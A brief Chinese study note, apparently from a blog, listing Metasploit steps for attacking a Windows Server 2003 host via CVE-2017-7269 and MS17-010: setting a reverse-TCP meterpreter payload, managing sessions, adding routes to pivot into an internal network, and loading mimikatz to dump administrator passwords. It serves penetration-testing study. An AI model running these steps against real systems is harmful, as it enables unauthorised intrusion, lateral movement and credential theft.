天天看點

【學習筆記】msf的使用

目标主機:2003rs2

漏洞:cve-2017-7269 ms17-010

exp搜尋 : search cve-xxx

利用:use exp名稱

看配置:show options

配置:set 配置名 一個值

設定payload:set payload windows/meterpreter/reverse_tcp(反彈shell)

最終攻擊:exploit

把shell放背景:background

互動:session -l 然後 session -i 1

添加路由攻擊内網:run autoroute -s 目标網段/24

你還應該去了解meterpreter的功能

例如screenshot 截屏

       load mimikatz 然後wdigest 擷取管理者密碼

繼續閱讀